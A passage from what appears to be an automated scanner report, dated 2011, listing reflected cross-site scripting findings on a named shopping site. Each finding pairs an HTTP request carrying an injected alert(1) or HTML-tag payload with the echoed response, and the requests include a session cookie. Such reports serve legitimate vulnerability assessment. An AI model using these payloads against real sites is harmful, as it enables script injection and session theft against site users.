Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Swimwearbc070'-alert(1)-'489ba6c8d0d/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:48:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Swimwearbc070'-alert(1)-'489ba6c8d0d/53';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.857. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1880'-alert(1)-'4070e905925 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Swimwear/53f1880'-alert(1)-'4070e905925 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:53:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Swimwear/53f1880'-alert(1)-'4070e905925';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.858. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37919'-alert(1)-'80e318a2088 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping37919'-alert(1)-'80e318a2088/Clothing-Accessories/194367784/Watches/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:00:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping37919'-alert(1)-'80e318a2088/Clothing-Accessories/194367784/Watches/36';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.859. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de16f"><a>ff06d6c3af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingde16f"><a>ff06d6c3af/Clothing-Accessories/194367784/Watches/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:52:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingde16f"><a>ff06d6c3af">
...[SNIP]...

4.860. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 645bf<script>alert(1)</script>5adbf37b053 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories645bf<script>alert(1)</script>5adbf37b053/194367784/Watches/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:06:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories645bf<script>alert(1)</script>5adbf37b053 <a href="#" id="backlink">
...[SNIP]...

4.861. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33beb'-alert(1)-'ddafe0f695f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories33beb'-alert(1)-'ddafe0f695f/194367784/Watches/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:05:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories33beb'-alert(1)-'ddafe0f695f/194367784/Watches/36';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.862. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef829'-alert(1)-'65615c2a724 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784ef829'-alert(1)-'65615c2a724/Watches/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:13:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784ef829'-alert(1)-'65615c2a724/Watches/36';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.863. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 408e4'-alert(1)-'f97b254136f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Watches408e4'-alert(1)-'f97b254136f/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:19:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/194367784/Watches408e4'-alert(1)-'f97b254136f/36';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.864. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8debd'-alert(1)-'e4d134f74fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Watches/368debd'-alert(1)-'e4d134f74fe HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:24:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Watches/368debd'-alert(1)-'e4d134f74fe';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.865. http://www.beirut.com/Shopping/Consumer-Goods/235690923 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d65a3'-alert(1)-'daf630a9340 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppingd65a3'-alert(1)-'daf630a9340/Consumer-Goods/235690923 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:44:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shoppingd65a3'-alert(1)-'daf630a9340/Consumer-Goods';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.866. http://www.beirut.com/Shopping/Consumer-Goods/235690923 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2df7e"><a>fa8cbfdc028 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping2df7e"><a>fa8cbfdc028/Consumer-Goods/235690923 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:37:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping2df7e"><a>fa8cbfdc028">
...[SNIP]...

4.867. http://www.beirut.com/Shopping/Consumer-Goods/235690923 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f749c<script>alert(1)</script>1603827485f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goodsf749c<script>alert(1)</script>1603827485f/235690923 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goodsf749c<script>alert(1)</script>1603827485f <a href="#" id="backlink">
...[SNIP]...

4.868. http://www.beirut.com/Shopping/Consumer-Goods/235690923 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9709'-alert(1)-'dc2afc07940 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goodsd9709'-alert(1)-'dc2afc07940/235690923 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Consumer-Goodsd9709'-alert(1)-'dc2afc07940';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.869. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4de26"><a>34b6c8001fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping4de26"><a>34b6c8001fc/Consumer-Goods/235690923/Flowers/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
